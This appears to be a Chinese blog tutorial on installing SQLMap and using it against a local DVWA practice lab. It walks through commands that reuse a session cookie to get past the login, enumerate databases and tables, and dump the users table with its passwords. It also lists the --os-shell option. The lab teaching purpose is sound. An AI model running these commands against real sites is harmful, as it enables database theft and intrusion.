安全测试必备工具——SQLMap 安装及基本应用

最新推荐文章于 2024-05-14 11:40:31 发布
最新推荐文章于 2024-05-14 11:40:31 发布
阅读量740 收藏 16
点赞数 11
文章标签: 安全 SQLMap 安装
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58552717/article/details/138342105
版权

检测SQL注入漏洞的专用工具是安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用。

1、什么是SQLMap?

SQLmap是一款由python开发的用来检测与利用SQL注入漏洞的免费开源工具。支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBMDB2、SQLite等数据库。有一个非常棒的特性,即对检测与利用的自动化处理(如数据库指纹、访问底层文件系统、执行命令)。

2、SQLMap下载

官方网站下载:http://sqlmap.org/

图片

这里选择Github去下载

图片

3、win10下SQLMap安装

1、先安装好python环境,不管是2还是3版本都支持(python安装过程略,自行百度解决)。安装后可cmd命令窗口输入python -V 查看到版本信息即为成功。

图片

2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录

3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用

图片

4、SQLMap的常用参数

-u∶指定目标URL进行sql注入检测

--batch:自动去做问题应答

--cookie :当前会话的cookie值

--dbs: 查询当前网站所有数据库

-D:指定数据库名

--tables:查询数据库下的所有表名

-T:指定表名

--columns:指定查询所有字段

-C:指定字段的名称

--dump:查询并导出其数据,拖库

--current-db:获取当前数据库

--current-user :获取当前登录数据库用户名称

--users:查询数据库的所有用户

--password:查询数据库用户的密码

--os-shell:直接返回一个shell(如果存在的话)

-flush-session 刷新session文件

如果不想用之前缓存这个目标的session文件,可以使用这个参数。会清空之前的session,重新测试该目标。

5、SQLMap的基本应用

基于DVWA靶场以下模块,进行SQLMap实操演示

图片

1、注入判断 -u

输入:python sqlmap.py -u http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit。去进行操作--会报错,需要登录。

图片

图片

2、添加cookie绕过登录

python sqlmap.py -u "http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low"。

运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch

图片

图片

通过以上结果可知,存在SQL注入点。

3、查询当下所有数据库

python sqlmap.py -u "http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" --dbs --batch

图片

4、查询指定库下的表名

python sqlmap.py -u "http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" -D dvwa --tables

图片

5、查指定表的所有字段

python sqlmap.py -u "http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" -D dvwa -T users --columns

图片

6、查询字段内容

python sqlmap.py -u "http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" -D dvwa -T users -C user,password --dump

这个过程有点慢,请耐心等待,最终得到表的所有用户及明文密码信息。

图片

最后

此文中提到的工具及技术操作,仅用于学术交流,请遵守《网络安全法》,严禁将此文中工具和技术用于非法攻击测试。

程序员与诗人
关注
  • 11
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
安全测试必备工具 —— SQLMap 安装基本应用
05-06 706
检测SQL注入漏洞的专用工具安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用。
hacker入门——最好用的渗透测试工具
热门推荐
华农老林的博客
10-12 1万+
前言: 本博客所有的黑客方面知识交流讨论仅供学习,请勿用于从事非法勾当! 苟利国家生死已,岂因福祸避趋之! 渗透测试,是专业安全人员为找出系统中的漏洞而进行的操作,这也是进行攻击前的第一个环节。 当然,是在恶意黑客找到这些漏洞之前,而这些业内安全专家各自钟爱的工具各种各样,一些工具是公开免费的,另一些则需要支付费用,但这篇文章向你保证,值得一看。 下面列举17个常用的渗透工具供大家参考。...
专业人士使用的 11 种渗透测试工具
OKCRoss的博客
10-15 797
渗透测试员,有时被称为道德黑客,是一名安全专家,对客户的网络或系统发起模拟攻击以找出漏洞。目标是展示恶意攻击者可能在何处以及如何利用目标网络,在真正的攻击发生之前缓解任何弱点。 渗透人员与恶意黑客使用的工具和技术基本相同。 回到过去,黑客攻击很困难,需要大量的手动操作。然而,时至今日一整套自动化测试工具将黑客变成了半机械人,可以进行比以往更多的测试的计算机增强型人类。好比,可以乘飞机,为什么要骑马?以下是使现代渗透测试人员的工作更快、更好、更智能的工具
阿里资深软件测试工程师推荐测试人员必学——安全测试入门介绍
fx20211108的博客
12-09 365
安全测试定义 安全测试是建立在功能测试基础上进行的测试,安全测试提供证据表明,在面对恶意攻击时,应用仍能充分满足它的需求,主要是对产品进行检验以验证是否符合安全需求定义和产品质量标准的过程 安全测试目的 提升产品安全质量 尽量在发布前找到安全问题予以修补降低风险 度量安全等级 验证安装在系统内的保护机制能否在实际应用中对系统进行保护,使之不被非法入侵 安全测试与常规测试区别 类比项常规测试安全测试 目标差异常规测试以发现 Bug 为目标安全测试以发现安全隐患为目标 假设条
软件安全测试工具你知道哪些实用吗?
OKCRoss的博客
10-14 154
BeEF允许你在用户的浏览器上建立一个钩子——例如,通过诱使他们点击您控制的链接——然后控制他们的浏览器选项卡、通过他们的浏览器传输流量等,如果你没有访问内部网络的权限,这种方法可以帮你达成目标。在最基本的用法中,ZAP充当HTTP转发代理,位于您的浏览器和您正在测试的站点之间。如果您想真正了解你的网络、应用程序、主机和员工的安全性,最好的方法是通过经验测试(渗透测试),一种能够模拟攻击工具、技术和程序的测试。鉴于这些安全工具存在被非法滥用的可能,请务必在遵守法律的前提下开展相关的学习和测试工作。
[转]hacker入门——最好用的渗透测试工具
tpriwwq的专栏
05-09 1296
前言: 本博客所有的黑客方面知识交流讨论仅供学习,请勿用于从事非法勾当! 苟利国家生死已,岂因福祸避趋之! 渗透测试,是专业安全人员为找出系统中的漏洞而进行的操作,这也是进行攻击前的第一个环节。 当然,是在恶意黑客找到这些漏洞之前,而这些业内安全专家各自钟爱的工具各种各样,一些工具是公开免费的,另一些则需要支付费用,但这篇文章向你保证,值得一看。 下面列举17个常用的渗透工具供大家参考。...
10大渗透神器,渗透测试必备
南迪叶先森
07-23 4750
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! 给你分享10款常用的渗透工具吧! 渗透测试,是专业安全人员为找出系统中的漏洞而进行的操作。 当然,是在恶意黑客找到这些漏洞之前,而这些业内安全专家各自钟爱的工具各种各样,一些工具是公开免费的,另一些则需要支付费用,但这篇文章向你保证,值得一看。 1.Nmap 2017年9月1日是Nmap的20岁生日。 从诞生之初,Nmap就一直是网络发现和攻击界面测绘的首选工具。 从主机发现和端口扫描,到操作系统检测和IDS规避/欺骗,Nmap.
汇总下关于安全的13款必备工具
一口Linux的专栏
03-06 1898
汇总下关于安全的几款必备工具: 1、burpsuite:http协议分析神器,里面包括了不少安全必备的功能,重放、爆破、扫描并且支持自定义脚本,实现自己想要的功能 2、nmap:网络扫描神器,扫描网络情况和端口开放情况,也可以加载nmap内置的poc脚本发现安全漏洞 3、sqlmap:这个主要是利用sql注入漏洞的工具,可以自定义扫描规则和方式,若是通读源码之后对sql注入会有相当深的理解 4、amass:这个是域名爆破工具,owasp开发的,速度和发现都相当不错 5、masscan:这个用来发现大规模网络
信息安全专家最爱用的17个渗透测试工具
任浩的博客
01-24 705
工欲善其事必先利其器,优秀的工具和资源,是每一个渗透测试专家工具箱中必不可少的居家旅行必备品。 渗透测试,是专业安全人员为找出系统中的漏洞而进行的操作。当然,是在恶意黑客找到这些漏洞之前。而这些业内安全专家各自钟爱的工具各种各样,一些工具是公开免费的,另一些则需要支付费用,但这篇文章向你保证,值得一看。 Nmap 2017年9月1日是Nmap的20岁生日。从诞生之初,Nmap就一直是网络发现和攻击界面测绘的首选工具。从主机发现和端口扫描,到操作系统检测和IDS规避/欺骗,Nmap是大大小小黑客行动的基本
SQLMap完成安全测试
03-03
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
尽管如此,SQLMAP无疑是一个强大的工具,它可以帮助你发现那些防火墙可能无法检测到的安全风险。 总结起来,SQLMAP是一种强大的、能够绕过防火墙检测的工具。它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时...
sqlmap 渗透测试工具
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件...———————————————— 本工具仅用于测试使用,请勿用于非法用途,需自行承担法律风险
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 971
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 331
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
提高岩土工程安全的关键:锚索测力计的应用
yousino1的博客
05-10 210
通过实时监控数据,工程师能够及时发现锚索力量的异常变化,并迅速采取补强措施,成功避免了一次可能的边坡滑坡,确保了施工安全和道路使用的安全。在众多技术和工具中,锚索测力计的应用在提高岩土工程的安全性方面发挥了不可替代的作用。- 坡面和边坡稳定:在施工或自然斜坡可能出现滑移的情况下,通过预应力锚索将斜坡加固,并使用锚索测力计监控锚索的实时力量,及时调整预应力,以防止坡面滑移。锚索测力计作为岩土工程中一项重要的监测工具,随着技术的不断进步,其应用将更加广泛,对保障工程结构的稳定性和安全性具有重大意义。
针对 % 号 | 引起的 不安全情况
m0_74381444的博客
05-11 954
%%%%%%
如何使用Nmap、Sqlmap、Burpsuite等工具进行安全测试
05-25
Nmap、Sqlmap、Burpsuite是非常流行的安全测试工具,可以帮助安全测试人员检测网络和应用程序中的漏洞和安全问题。以下是这些工具的简要说明和使用方法: 1. Nmap:Nmap是一款网络探测和安全测试工具,可以用于扫描...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值